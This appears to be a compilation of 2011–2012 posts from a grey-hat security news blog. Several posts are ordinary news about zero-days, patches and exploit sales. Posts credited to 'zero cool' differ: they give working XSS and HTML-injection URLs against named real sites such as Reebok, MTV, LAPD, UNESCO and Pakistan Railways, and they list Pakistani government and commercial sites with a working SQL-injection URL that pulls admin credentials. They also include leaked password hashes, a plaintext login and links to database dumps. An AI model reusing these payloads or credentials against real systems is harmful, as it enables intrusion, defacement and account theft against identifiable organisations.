XSS vulnerability found by zero cool on (reebok,indiagames,mtv,lapdonline,unesco,pcboard)

XSS vulnerability found by zero cool on
rebook.com
bsnl1.indiagames.com
www.lapdonline.org
whc.unesco.org
cricket.com.au

http://www.reebok.com/IN/search?t=%3E%22%3E%3CMARQUEE%3EHACKED%20BY%20ZERO%20COOL%3C/MARQUEE%3E%3Ciframe+src+%3D%22http://www.voiceofgreyhat.com/2011/04/xss-vulnerability-found-by-zero-cool.html%22+width%3D%22100%25%22+height%3D%22100%25%22%3E%3C%2Fiframe%3E&Submit=Go

http://bsnl1.indiagames.com/bpremium/index.jsp  


vul link= [put the code in the search bar] >"><MARQUEE>HACKED BY ZERO COOL</MARQUEE><img src="http://img204.imageshack.us/img204/1322/zeropk.png" img>

http://www.lapdonline.org/ 


vul link=  http://www.lapdonline.org/search_results/search/&view_all=1&chg_filter=1&searchType=content_basic&search_terms=%3E%22%3E%3CMARQUEE%3EHACKED%20BY%20ZERO%20COOL%3C/MARQUEE%3E%3Cimg%20src=%22http://img204.imageshack.us/img204/1322/zeropk.png%22%20img%3E

http://www.mtv.co.uk/


vul link = http://www.mtv.co.uk/search?k=%3E%22%3E%3CMARQUEE%3EHACKED%20BY%20ZERO%20COOL%3C/MARQUEE%3E%3Cimg%20src=%22http://img204.imageshack.us/img204/1322/zeropk.png%22%20img%3E&op=Search

http://www.pcboard.com.pk/
vul link=  [put the code in the search bar] >"><MARQUEE>HACKED BY ZERO COOL</MARQUEE><img src="http://img204.imageshack.us/img204/1322/zeropk.png" img>

http://whc.unesco.org/


vul link =http://whc.unesco.org/en/list/?search=%3E%22%3E%3CMARQUEE%3EHACKED+BY+ZERO+COOL%3C%2FMARQUEE%3E%3Cimg+src%3D%22http%3A%2F%2Fimg204.imageshack.us%2Fimg204%2F1322%2Fzeropk.png%22+img%3E&searchSites=&search_by_country=&search_yearinscribed=&type=&themes=&media=&region=&criteria_restrication=&order=


html injection vul in  cricket.com.au also found by zero cool

http://cricket.com.au/searchresult/%3Cimg%20src=%22http://fc09.deviantart.net/fs30/i/2009/252/e/e/Zero_Wallpaper_4_by_Zero1122.jpg%22%20%3C/img%3E

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">XSS vulnerability found by zero cool on (reebok,indiagames,mtv,lapdonline,unesco,pcboard)"https://www.voiceofgreyhat.com/2011/04/xss-vulnerability-found-by-zero-cool-on.html</a>

Kaspersky Releases Linux Mail Security With Anti-malware, Anti-spam & Content Filtering

Kaspersky Releases Linux Mail Security With Anti-malware, Anti-spam & Content Filtering 

Russian anti virus firm & security giant  Kaspersky Lab has released an anti-spam and anti-malware application called Linux Mail Security which can be integrated into different type of Linux-based mail server to fight spam and block malicious attachments. The latest spam-fighting features – including Reputation Filtering and Enforced Anti-Spam Updates Service  help to filter out zero-hour spam, while our new ZetaShield technology helps to shield businesses from zero-day and targeted attacks. Designed for integration with a range of Linux-based mail systems, Kaspersky Linux Mail Security delivers the security, flexibility and ease of management that businesses and ISPs demand. 

Key Features:- 

• Advanced antivirus engine- Kaspersky Linux Mail Security includes the latest version of Kaspersky Lab’s award-winning antivirus engine – with behaviour stream signatures – to help detect and remove malicious attachments from incoming emails.
• 
  
• Zero-Day Exploit and Targeted Attack (ZETA) Shield- Kaspersky’s ZetaShield offers protection against unknown malware and exploits – to defend you from zero-day and zero-hour attacks and APTs (Advanced Persistent Threats).
• 
  

Powerful Anti-Spam Engine- Kaspersky Linux Mail Security provides the latest version of Kaspersky’s anti-spam engine – including two powerful new technologies:

• Enforced Anti-Spam Updates Service – uses push technology, directly from the Kaspersky cloud, to deliver real-time updates. By reducing the ‘update window’ from 20 minutes to approximately 1 minute, the Enforced Anti-Spam Updates Service helps to defend businesses against zero-hour spam and spam epidemics.
• Cloud-assisted Reputation Filtering – fights against unknown spam, to enhance the spam capture rate and reduce the number of false positives.

Kaspersky Security Network -The cloud-based Kaspersky Security Network (KSN) gathers data from millions of participating users’ systems around the world to help defend your system from the very latest viruses and malware attacks. Potential threats are monitored and analysed – in real-time – to help block dangerous actions, before harm is caused.

Attachment filtering- The new Format Recogniser feature can filter attachments – using information about file type, name and message size. This helps businesses to enforce their email usage policy and can help to address corporate liability issues that can arise when users try to distribute illegal music or video files via the corporate email system.

Improved!Global Blacklists and Whitelists- In addition to creating corporate blacklists or whitelists, administrators can manage ‘allowed’ or ‘denied’ senders email – using IPv4 and IPv6, wildcards and regular expressions.

Personal Blacklists and Whitelists- Users also can create their own blacklists and whitelists.

Backup and personal backup with flexible search -Blocked email is quarantined in a backup system. If the system uses Microsoft Active Directory or OpenLDAP, individual users can access their personal backup via the web so they’re less likely to need to call your helpdesk.

Integration with most popular MTAs (Postfix, Sendmail, Exim, qmail and CommunigatePro)- Kaspersky Linux Mail Security lets you select the method of integration, depending on your choice of Mail Transfer Agent (MTA) – so you can integrate as a filter or using a Milter API.

Antivirus command line file scanner- The Kaspersky Anti-Virus On-Demand Scanner can be used for on-demand virus checking of objects – which can include directories, regular files and devices such as hard drives, flash drives and DVD-ROMs.

Amavisd-new- Kaspersky Linux Mail Security supports integration with Linux mail systems using the high-performance AMaViS interface.

Monitoring and Reporting features- 

• SNMP (Simple Network Management Protocol) support – any type of event can be monitored using SNMP events and traps
• A new dashboard gives an at-a-glance view of status and monitoring
• Detailed, flexible reporting in PDF format – for customisable reports that help in the monitoring and analysis of security and policies
• Notification system – informs administrators and document owners about policy violation incidents
• Detailed logs – on all product actions, to help in identifying problems

Easy to deploy, maintain and manage- 

• System administrators can run manual updates or set the rules for fully automatic updates of antivirus, anti-spam and ZetaShield
• Integration with Active Directory and OpenLDAP
• Rich email traffic management rules – administrators can create rules according to corporate security policies
• IPv6 support
• Scalable architecture – the entire system can be easily migrated from a test server to a production environment

Kaspersky Linux Mail Security will support the following Linux distributions - Red Hat Enterprise Linux 6.2 Server, Fedora 16, SUSE Linux Enterprise Server 11 SP2, Debian GNU/Linux 6.0.4 Squeeze, CentOS 6.2, openSUSE Linux 12.1, Ubuntu 10.04 LTS; 12.04 LTS, Mandriva Enterprise Server 5.2, FreeBSD 8.3, 9.0, Canaima 3.0, Asianux 4 SP1. 

For Detailed Information Click Here

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Kaspersky Releases Linux Mail Security With Anti-malware, Anti-spam & Content Filtering"https://www.voiceofgreyhat.com/2012/09/Kaspersky-Releases-Linux-Mail-Security.html</a>

Google Hackers Who Unleashed Hydraq/Aurora Trojan Strikes Again

Google Hackers Who Unleashed Hydraq/Aurora Trojan Strikes Again 

Computer security firm Symantec has unveiled, that a hacker group which unleashed the Hydraq or Aurora Trojan horse against Google and 34 other companies in 2009 has also been linked to attacks that have compromised systems at defense contractors, human rights organizations, and other large groups. According to the official blog of Symantec- they have been monitoring the activities of that hacker group since last three years and figure out that these attackers have used a large number of zero-day exploits against not just the intended target organization, but also on the supply chain manufacturers that service the company in their cross hairs. These attackers are systematic and re-use components of an infrastructure we have termed the "Elderwood Platform". The term "Elderwood" comes from the exploit communication used in some of the attacks. This attack platform enables them to quickly deploy zero-day exploits. The attacking methodology has always used spear phishing emails but we are now seeing an increased adoption of "watering hole" attacks (compromising certain websites likely to be visited by the target organization). The overall campaign by this group has been dubbed by the name "Elderwood Project".  

Serious zero-day vulnerabilities, which are exploited in the wild and affect a widely used piece of software, are relatively rare; there were approximately eight in 2011. The past few months however has seen four such zero-day vulnerabilities used by the Elderwood attackers. Although there are other attackers utilizing zero-day exploits (for example, the Sykipot, Nitro, or even Stuxnet attacks), we have seen no other group use so many. The number of zero-day exploits used indicates access to a high level of technical capability. Here are just some of the most recent exploits that they have used:

•  Adobe Flash Player Object Type Confusion Remote Code Execution Vulnerability (CVE-2012-0779)
•  Microsoft Internet Explorer Same ID Property Remote Code Execution Vulnerability (CVE-2012-1875)
•  Microsoft XML Core Services Remote Code Execution Vulnerability (CVE-2012-1889)
•  Adobe Flash Player Remote Code Execution Vulnerability (CVE-2012-1535) 

Symantec have published a research paper that details the links between various exploits used by this attacking group, their method of targeting organizations, and the Elderwood Platform. It puts into perspective the continuing evolution and sheer resilience of entities behind targeted attacks. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Google Hackers Who Unleashed Hydraq/Aurora Trojan Strikes Again"https://www.voiceofgreyhat.com/2012/09/Google-Hackers-Who-Unleashed-Hydraq-Trojan-Strikes-Again.html</a>

Zero-Day Vulnerability In Flash Patched By Adobe

Zero-Day Vulnerability In Flash Patched By Adobe 

Yet another Zero day vulnerability found in Adobe Flash Player. Earlier hackers found zero-day exploit in flash player which can allow an attacker to hack you web-cam remotely later Adobe patched that. Before releasing Flash Player 11 Adobe issued new privacy policy and security update but now it seems that those are of zero use. 11.1.102.55 and earlier versions for Windows, Macintosh, Linux and Solaris, Adobe Flash Player 11.1.112.61 and earlier versions for Android 4.x, and Adobe Flash Player 11.1.111.5 and earlier versions for Android 3.x and 2.x. These vulnerabilities could cause a crash and potentially allow an attacker to take control of the affected system.

Affected Version:- 

• Adobe Flash Player 11.1.102.55 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems

• Adobe Flash Player 11.1.112.61 and earlier versions for Android 4.x, and Adobe Flash Player 11.1.111.5 and earlier versions for Android 3.x and 2.x

Later Adobe confirmed that and immediately released a patch to close the security hole. Through this security release Adobe also resolves a universal cross-site scripting vulnerability that could be used to take actions on a user's behalf on any website or webmail provider, if the user visits a malicious website. There are reports that this vulnerability (CVE-2012-0767) is being exploited in the wild in active targeted attacks designed to trick the user into clicking on a malicious link delivered in an email message (Internet Explorer on Windows only). Google's Chrome Web browser, which directly integrates Flash into its software (unlike competing browsers) also received an update to reflect Adobe's patch update. 

Recommendation From Adobe:-

Adobe recommends users of Adobe Flash Player 11.1.102.55 and earlier versions for Windows, Macintosh, Linux and Solaris update to Adobe Flash Player 11.1.102.62. Users of Adobe Flash Player 11.1.112.61 and earlier versions on Android 4.x devices should update to Adobe Flash Player 11.1.115.6. Users of Adobe Flash Player 11.1.111.5 and earlier versions for Android 3.x and earlier versions should update to Flash Player 11.1.111.6. For further details click here.

Earlier in 2011 another Flash Player bug found in Blackberry OS & later fixed by the developer and also last year adobe closes serious security hole in Acrobat 9X & Adobe Reader.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Zero-Day Vulnerability In Flash Patched By Adobe"https://www.voiceofgreyhat.com/2012/02/zero-day-vulnerability-in-flash-patched.html</a>

VUPEN Researchers Said: They Have First Zero-Day Exploit for Windows 8 & Internet Explorer 10

VUPEN Researchers Said: They Have First Zero-Day Exploit for Windows 8 & Internet Explorer 10

Everyday the users of Microsoft newly launched and so far most advanced windows operating system, I mean Windows 8 are increasing. But we have to keep in mind the security threats are also increasing in parallel. Recently well known French IT security firm Vupen, also known as controversial bug hunters and exploit sellers claimed to have Zero-day exploit of Windows 8. Experts at Vupen Security took credit of cracking the low-level security enhancements featured in Windows 8, Microsoft's latest operating system. According a tweet made by the official account of Vupen Security said it already has a Windows 8 exploit on offer. "Our first 0day for Win8+IE10 with HiASLR/AntiROP/DEP & Prot Mode sandbox bypass (Flash not needed) is ready for customers. Welcome #Windows8" 

Apparently, the exploit combines several unpatched (0-day) security holes in the new version of Windows and the bundled Internet Explorer 10 browser to inject malicious code into systems via specially crafted web pages. Also VUPEN CEO and head of research Chaouki Bekrar sent out a pair of ominous Tweets yesterday claiming to have developed the first zero-day exploit for Windows 8 and Internet Explorer 10, both released Oct. 26. Bekrar hints the exploit is a sandbox bypass for IE10 with ASLR, DEP and anti-ROP mitigations enabled. “We welcome #Windows8 with various 0Ds combined to pwn all new Win8/IE10 exploit mitigations,” Bekrar wrote. 

The exploit allegedly bypasses all of Windows 8's malware protection features: for example the Address Space Layout Randomization (ASLR) function that Microsoft has extended in the current edition of Windows to cover more system areas and offer improved randomisation. Vupen claims that the exploit also bypasses the Data Execution Prevention (DEP) and ROP features as well as Internet Explorer's sandbox-like Protected Mode. A patch for the exploited holes may not become available in the foreseeable future: Vupen said that it discovered the vulnerabilities itself and doesn't plan to disclose them to Microsoft. The company is only offering its exploit to its paying customers, among them government investigation authorities. Should Microsoft close the holes, the elaborate exploit would significantly decrease in value.

-Source (The-H & threatpost)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">VUPEN Researchers Said: They Have First Zero-Day Exploit for Windows 8 & Internet Explorer 10"https://www.voiceofgreyhat.com/2012/11/VUPEN-Researchers-Have-0Day-Exploit-for-Windows8-IE10.html</a>

Zero-Day Vulnerability Found in The Server Monitoring Software of HP

Zero-Day Vulnerability Found in The Server Monitoring Software of HP

After the massacre of HP LaserJet Printers yet again another product of HP (server monitoring software) has been infected with zero-day vulnerability. Hewlett-Packard have already issued a security warning to its customers about two security vulnerabilities in its Operations Agent server monitoring software. The vulnerabilities were reported to HP by Luigi Auriemma via TippingPoint's Zero Day Initiative (ZDI). According to the company, unspecified errors in the enterprise software for AIX, HP-UX, Linux, Solaris and Windows can be exploited by a remote attacker to compromise a vulnerable system and execute arbitrary code. Both of these errors have a CVSS 2.0 (Common Vulnerability Scoring System) base score of 10.0, the highest.

Versions prior to 11.03.12 on all supported platforms are affected; upgrading to 11.03.12 corrects the problems. A full list of affected versions, and patch download information can be found in the company's security advisory. HP advises all administrators to install the patches as soon as possible. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Zero-Day Vulnerability Found in The Server Monitoring Software of HP"https://www.voiceofgreyhat.com/2012/07/zero-day-vulnerability-found-in-server.html</a>

11 High Profile Websites of Pakistan is Vulnerable Said Zero, He also Exposed DB and Credentials

11 High Profile Websites of Pakistan is Vulnerable Said Zero, He also Exposed Data Base and Credentials of Admins.


List Of Vulnerable Sites:- 


http://www.awt.com.pk/
http://www.unapakistan.org.pk/
www.psf.gov.pk
www.commerce.gov.pk
http://www.whatmobile.com.pk/
http://www.competitiveness.org.pk/
http://www.whatmobile.com.pk/
http://www.smeda.org.pk/
http://www.shifa.com.pk/
http://www.gallup.com.pk/ 
http://www.onlinenews.com.pk/
www.phonebook.com.pk


Here are the details of those Sites:- 


1) Army welfare trust of Pakistan Hacked by zero





Hacked website :-
http://www.awt.com.pk/news_detail.php?news_id=9
Mirror link:-
http://mirror.sec-t.net/defacements/?id=44797




2) XSS Vulnerablity in United Nations Association of Pakistan 



link:-


http://www.unapakistan.org.pk/search.php?search=%3E%22%3E%3Cscript%3Ealert%28%22ZERO%20WAS%20HERE%22%29%3C/script%3E&section=Whole+Site&x=24&y=1


3) Pakistan Science foundation is vul to sql-i 


Data Base:-
http://pastebin.com/XCtn8Ksw


4) government of pakistan Ministry of Commerce is vulnerable to sql-i 

admin	$P$BCr2kHTn8oXYjZ.z2AabI56aSgo7gs.
khushnaam	$P$BtJsGbrR1l0.IYsv9a1tJhwkjMMYO/.

Data Base:-
http://pastebin.com/WKwP68HC


5) civildefence of pakistan vul to sqli found by zero
Data Base:-
http://pastebin.com/HsXvQAGA


6) http://www.shifa.com.pk/ is vulnerable to sql-i 


Data Base:-
http://pastebin.com/8r2vqqYF


7) http://www.smeda.org.pk/ is vulnerable to sql-i 
Database:-
http://pastebin.com/7Xukb7cH


8) http://www.gallup.com.pk/ vulnerable to sql-i 

Data Base:-
http://pastebin.com/3vNLAmry


9) http://www.onlinenews.com.pk/ vulnerable to sql-i 

3e8edbe7d481ca8ba452ae92631a905e	admin
4bc2cfed02b6bebf99b6646c82cec3b8	admin

Data Base:-
http://pastebin.com/y7Vt0zSC


10) http://www.whatmobile.com.pk/ vulnerable to sql-i 



user: aamir
pass:NoMoreBullShit81
Data Base:-
http://pastebin.com/TzTMjKYK


11) http://www.competitiveness.org.pk/ vulnerable to sql-i 


Vulnerable Link:-


http://www.competitiveness.org.pk/subpage.php?pageid=-21+union+select+1,concat%28admin_name,0x3a,admin_password%29,3,4,5,6,7,8,9+FROM+tbl_admin--

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">11 High Profile Websites of Pakistan is Vulnerable Said Zero, He also Exposed DB and Credentials"https://www.voiceofgreyhat.com/2011/06/11-high-profile-websites-of-pakistan-is.html</a>

Microsoft shows class in disclosing Google zero-day

Back in June of last year, Tavis Ormandy, a Google engineer in Switzerland, caused quite a stir. As Gregg Keizer reported at the time, Ormandy told Microsoft about a previously unknown security hole in Windows on June 5, and on June 9 he published a full description of the vulnerability, including proof-of-concept code, on the Full Disclosure mailing list.

Microsoft blew a corporate gasket. Mike Reavey, the director of the Microsoft Security Response Center, blogged the following day, "Public disclosure of the details of this vulnerability and how to exploit it, without giving us time to resolve the issue for our potentially affected customers, makes broad attacks more likely and puts customers at risk."

Omandy responded that he was acting on his own behalf, not as a Google employee, but Reavy didn't buy it. The relationship between Microsoft and Google turned from frosty to frigid.

Last week, Microsoft showed its mettle by publicly issuing a new policy and two new "Microsoft Vulnerability Research Advisories" -- a completely new breed of Microsoft malware-fighting animal.

The policy is a nine-page document saying, basically, that when Microsoft discovers a zero-day flaw in some other vendor's product, Microsoft will work with the vendor to fix the vulnerability -- and make sure it's fixed before telling the world: "If attacks are underway in the wild, and the vendor is still working on the update, then both the finder and vendor work together as closely as possible to provide early public vulnerability disclosure to protect customers."

There are exceptions to the private reporting restriction. The policy allows Microsoft to divulge details if the vulnerability becomes known to the public at large, when there's evidence that the vulnerability is being used, or when the vendor doesn't respond.

That last point has become a bone of contention with several security researchers who claim that Microsoft hasn't responded quickly enough -- or, indeed, hasn't responded at all -- to their reports of Microsoft vulnerabilities. To be fair, no one has yet determined precisely how long it takes for a lack of response to result in a vendor being classified as "unresponsive."

Microsoft accompanied the new procedure with two new MSVR advisories, dubbed MSVR11-001and MSVR11-002. It comes as no surprise that both of them describe previously undocumented security holes in Google products that had been patched by Google. (MSVR11-002 describes a problem in both Google Chrome and Opera.)

Neither vulnerability is particularly interesting. The first one, a buffer overflow, allows arbitrary code to run, but only in the confines of the Chrome sandbox. It was fixed in Chrome Version 6.0.472.59, which was released seven months ago. The second requires advance knowledge of a specific local IP address. It was fixed in Chrome 8.0.552.215, which was released four months ago. Apparently, Microsoft held onto both reports, pending final publication of their new policy.

If you or someone in your organization ever stumbles on a zero-day vulnerability in a software product, take a few minutes to look over Microsoft's policy. I won't get sucked into debating the virtues of Full Disclosure versus Coordinated Disclosure, but it would certainly be instructive to see how Microsoft says it would treat you and your organization if the shoe were on the other foot.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Microsoft shows class in disclosing Google zero-day"https://www.voiceofgreyhat.com/2011/04/microsoft-shows-class-in-disclosing.html</a>

Egyptian Hackers Selling Zero-day Exploit of Yahoo Mail For $700

Egyptian Hackers Selling Zero-day Exploit of Yahoo Mail For $700

Those people who wander in many underground hackers community, knows very well that several unethical equipment such as Botnet, Zero-day exploit, black hole exploit kit, malware, undisclosed vulnerabilities and so on were sold there for different prices. Those products were generally priced between $5-$500, but today I will talk about an expensive product, which listed itself top on the black market. I am talking about a new cross-site scripting exploit that enables attackers to steal cookies and access Yahoo email accounts. According to the blog post of Krebs on Security -A zero-day vulnerability in yahoo.com that lets attackers hijack Yahoo! email accounts and redirect users to malicious Web sites offers a fascinating glimpse into the underground market for large-scale exploits. The exploit, being sold for $700 by an Egyptian hacker on an exclusive cybercrime forum, targets a “cross-site scripting” (XSS) weakness in yahoo.com that lets attackers steal cookies from Yahoo! Webmail users. Such a flaw would let attackers send or read email from the victim’s account. In a typical XSS attack, an attacker sends a malicious link to an unsuspecting user; if the user clicks the link, the script is executed, and can access cookies, session tokens or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. The hacker posted the following video to demonstrate the exploit for potential buyers. 

“I’m selling Yahoo stored xss that steal Yahoo emails cookies and works on ALL browsers,” wrote the vendor of this exploit, using the hacker handle ‘TheHell.’ “And you don’t need to bypass IE or Chrome xss filter as it do that itself because it’s stored xss. Prices around for such exploit is $1,100 – $1,500, while I offer it here for $700. Will sell only to trusted people cuz I don’t want it to be patched soon!” -said the hacker.  

In response Ramses Martinez, director of security at Yahoo!, said the challenge now is working out the exact yahoo.com URL that triggers the exploit, which is difficult to discern from watching the video. “Fixing it is easy, most XSS are corrected by simple code change,” Martinez said. “Once we figure out the offending URL we can have new code deployed in a few hours at most.”

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Egyptian Hackers Selling Zero-day Exploit of Yahoo Mail For $700"https://www.voiceofgreyhat.com/2012/11/Egyptian-Hacker-Selling-Zero-day-Exploit-of-Yahoo-Mail.html</a>

Zero-day Vulnerability in "Cloud" Revealed at TakeDown Conference

 Zero-Day Vulnerability in "Cloud" Revealed at TakeDown Conference

 

Almost every IT companies across the globe acknowledging "Cloud" technology to store large amount of data while reducing the cost. Also almost 99% of them assumes that data is being stored offsite it is securely preserved and they no longer have to worry about risk. But this assumption proved wrong when security experts at TechDown Conference reveled zero-day vulnerability in Cloud. “Au contraire. Risk cannot be outsourced,” says professional ethical hacker, Dave Chronister of Parameter Security (St. Louis, MO). Mr. Chronister went onto say, “It’s because of this mindset that hackers are preying upon the cloud and are gaining control of huge stores of information through a single attack” - which is exactly what Mr. Chronister recently did. Mr. Chronister went onto say, “During a recent cloud security audit, I was able to identify a zero day exploit and within minutes gained access to the cloud sphere and every system that was on that cloud—giving me complete control. Needless to say, the client was shocked because they were touting their cloud offering as 100% secure.”
Bringing his real-world cloud hacking experience to event goers at TakeDownCon in Dallas in May, his presentation entitled “The Cloud is a Smoke Screen” provides eye-opening information about the false sense of security cloud providers and users possess. Specifically, Chronister’s presentation will:-

• Expose various cloud vulnerabilities

• Address cloud security issues

• Provide insight into selecting cloud providers and questions to ask with     regards to data security, risk and incident response

• Offer ways to successfully implement your own cloud solution and mitigate risk

• Share his real-world experiences hacking multiple cloud environments

• And much more

-Source (TechDown)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Zero-day Vulnerability in "Cloud" Revealed at TakeDown Conference"https://www.voiceofgreyhat.com/2012/04/zero-day-vulnerability-in-cloud.html</a>

non-persistent xss vulnerability in Pakistan Railway's site

non-persistent xss vulnerability in www.pakrail.com found by zero cool.


link 


http://www.pakrail.com/search.php?txtsearch=%3E%22%3E%3Chead%3E+%3Ctitle%3EHacked+by+ZERO%3C%2Ftitle%3E+%3C%2Fh1%3E%3CBODY++++BGCOLOR%3D%22%23000000%22++++TEXT%3D%22%23FFFFFF%22+%3E+%3Cbody%3E+%3C%2Fhead%3E+%3Cbr%3E+%3Cbr%3E+%3Cbr%3E+%3Ccenter%3E%3Cimg+src%3D%22http://img156.imageshack.us/img156/1594/zeroso.png%22++%3E%3C%2Fcenter%3E+%3Cbr%3E+%3Ch3%3E+%3C%2Fcaption%3E+%3Ccenter%3E%3Ccaption%3E$+HACK%20+$+ME+$+IF%20U%20CAN+$%3C%2Fa%3E%3C%2Fcenter%3E+%3C%2Fcaption%3E+%3Cbr%3E+%3Ccenter%3E+%3Cbody+onLoad%3D%22document.form.input.focus%28%29%3B%22%3E++%3Cbr%3E+%3Cfont+color%3D%22red%22%3E%3Cspan+id%3D%22typing%22%3E+Your+site+is+vulnerable+to+xxs+%3Cbr%3E+Hacked+by+ZERO%3C%2Fspan%3E++%3Cscript+type%3D%22text%2Fjavascript%22%3E++interval+%3D+30%3B+%2F%2F+Interval+in+milliseconds+to+wait+between+characters++if%28document.getElementById%29+{+t+%3D+document.getElementById%28%22typing%22%29%3B+if%28t.innerHTML%29+{+typingBuffer+%3D+%22%22%3B+%2F%2F+buffer+prevents+some+browsers+stripping+spaces+it+%3D+0%3B+mytext+%3D+t.innerHTML%3B+t.innerHTML+%3D+%22%22%3B+typeit%28%29%3B+}+}++function+typeit%28%29+{+mytext+%3D+mytext.replace%28%2F%3C%28[^%3C]%29*%3E%2F%2C+%22%22%29%3B+%2F%2F+Strip+HTML+from+text+if%28it+%3C+mytext.length%29+{+typingBuffer+%2B%3D+mytext.charAt%28it%29%3B+t.innerHTML+%3D+typingBuffer%3B+it%2B%2B%3B+setTimeout%28%22typeit%28%29%22%2C+interval%29%3B+}+}+%3C%2Fscript%3E+%3Cbr%3E+%3C%2Ffont%3E+%3Cbr%3E+%3Cbr%3E+%3Ccenter%3E%3Ccaption%3Eyou.got.hacked.by.ZERO...!!!!%3C%2Fa%3E%3C%2Fcenter%3E+%3C!--+Start+of+StatCounter+Code+--%3E+%3Cscript+type%3D%22text%2Fjavascript%22%3E+var+sc_project%3D6474887%3B++var+sc_invisible%3D1%3B++var+sc_security%3D%229181d223%22%3B++%3C%2Fscript%3E++%3Cscript+type%3D%22text%2Fjavascript%22+src%3D%22http%3A%2F%2Fwww.statcounter.com%2Fcounter%2Fcounter.js%22%3E%3C%2Fscript%3E%3Cnoscript%3E%3Cdiv+class%3D%22statcounter%22%3E%3Ca+title%3D%22hit+counter%22+href%3D%2 2http%3A%2F%2Fstatcounter.com%2Ffree_hit_counter.html%22+target%3D%22_blank%22%3E%3Cimg+class%3D%22statcounter%22+src%3D%22http%3A%2F%2Fc.statcounter.com%2F6474887%2F0%2F9181d223%2F1%2F%22+alt%3D%22hit+counter%22+%3E%3C%2Fa%3E%3C%2Fdiv%3E%3C%2Fnoscript%3E+%3C!--+End+of+StatCounter+Code+--%3E%3C%2Fbody%3E+%3C%2Fdiv%3E+%3C%2Fform%3E+%3C%2Fcenter%3E+%3C%2Fbody%3E&x=0&y=0

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">non-persistent xss vulnerability in Pakistan Railway's site"https://www.voiceofgreyhat.com/2011/05/non-persistent-xss-vulnerability-in.html</a>

Security firm exploits Chrome zero-day to hack browser, escape sandbox

 French security company Vupen said today that it's figured out how to hack Google's Chrome by sidestepping not only the browser's built-in "sandbox" but also by evading Windows 7's integrated anti-exploit technologies.

Google said it was unable to confirm Vupen's claims.

"The exploit ... is one of the most sophisticated codes we have seen and created so far, as it bypasses all security features including ASLR/DEP/Sandbox," said Vupen in a blog post Monday. "It is silent (no crash after executing the payload), it relies on undisclosed ('zero-day') vulnerabilities and it works on all Windows systems."

Vupen posted a video demonstration of its exploit on YouTube.

According to Vupen, its exploit can be served from a malicious Web site. If a Chrome user surfed to such a site, the exploit executes "various payloads to ultimately download the Calculator from a remote location and launch it outside the sandbox at Medium integrity level."

Vupen used the Windows Calculator only as an example: In an actual attack, the "calc.exe" file would be replaced by a hacker-made payload.

Historically, Chrome has been the most difficult browser to hack, primarily because of its sandbox technology, which is designed to isolate Chrome from the rest of the machine to make it very difficult for a hacker to execute attack code on the PC.

For example, Chrome has escaped unscathed in the last three Pwn2Own hacking contests, an annual challenge hosted by the CanSecWest conference in Vancouver, British Columbia, and sponsored by HP TippingPoint's bug bounty program.

Last March, a team from Vupen walked away with a $15,000 cash prize afterhacking Safari, the Apple browser that, like Chrome, is built on the open-source WebKit browser engine.

But no one took on Chrome at 2011's Pwn2Own, even though Google had offered a $20,000 prize to the first researcher who hacked the browser and its sandbox.

The Vupen attack code also bypassed Windows 7's ASLR (address space layout randomization) and DEP (data execution prevention), two other security technologies meant to make hackers' jobs tougher.

Vupen said it would not publicly release details of the exploit, or the unpatched bug(s) in Chrome. "This code and the technical details of the underlying vulnerabilities will not be publicly disclosed," said Vupen. "They are shared exclusively with our Government customers as part of our vulnerability research services."

Last year, Vupen changed its vulnerability disclosure policies when it announced it would no longer report bugs to vendors, but instead would reveal its research only to paying customers.

Other security experts reacted today to the news of one or more Chrome zero-days, and to Vupen's practice of providing details only to its clients.

"I suppose that means we have a known Chrome 0-day floating around. That's fun," said Jeremiah Grossman, CTO of WhiteHat Security, in a Twitter message today.

"That also means for that the [government] is outbidding Google for bug bounties," Grossman added in a follow-up tweet.

"For now, the [government] still has more money than Google," chimed in Charlie Miller, the only researcher who has won cash prizes at four straight Pwn2Own contests.

Google, like rival browser maker Mozilla, runs a bounty program that pays independent researchers for reporting flaws in Chrome. Last month, Google paid out a record $16,500 in bounties for bugs it patched in a single update. In the first four months of 2011, Google spent more than $77,000 on bug bounties.

Google cited Vupen's policy of not reporting flaws as the reason it could not verify the French firm's assertions.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Security firm exploits Chrome zero-day to hack browser, escape sandbox"https://www.voiceofgreyhat.com/2011/05/security-firm-exploits-chrome-zero-day.html</a>

IE Flaw Can Cause Zero-Day Exploit

A security breach of Internet Explorer could occur if a hacker hijacks session cookies from users' visits to a Web site, According to Rosario Valotta, an Italian security researcher. In a process coined "cookiejacking" by Valotta, the stolen data can be used to carry out a zero-day attack. Successfully compromised systems can be installed with malware, send messages or forge clicks. The researcher warns that this flaw affects all versions of Microsoft’s Internet browser. The exploit only occurs when a user drags and drops an object across the PC screen. Valotta was able to test this by creating a Facebook game where users dragged articles of clothing to reveal an undressed photo of a woman. "I published this game online on FaceBook and in less than three days, more than 80 cookies were sent to my server, " Valotta told Reuters. "And I've only got 150 friends." To be leveraged into a zero-day attack a hacker would need to create an IFrame element in a Web site and have a user select the entire cookie. Using Valotta's Facebook demonstration as an example, the cookie would be hidden in the article of clothing object. Once a user drags the piece of clothing, this violates the browser’s cross-zone interaction policy, and allows the attacker access to the victim’s system. To add another level of difficulty when performing this attack, the exploit involves hackers knowing a potential victim’s Windows username and which OS version is being used -- before getting the user to select the entire content of the harmful cookie. While Microsoft is investigating the discovered flaw, Microsoft spokesman Jerry Bryant believes there is little risk of vulnerability being exploited. "Given the level of required user interaction, this issue is not one we consider high risk," said Bryant.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
